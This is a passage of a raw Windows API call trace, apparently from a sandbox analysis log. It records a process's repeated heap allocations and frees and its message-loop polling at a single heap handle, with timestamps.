out: hHeap=0x8a0000) returned 1 [0180.374] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.374] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0180.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0180.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0180.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0180.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0180.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0180.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0180.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0180.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0180.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0180.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0180.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0180.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0180.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.386] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.387] HeapFree (in: 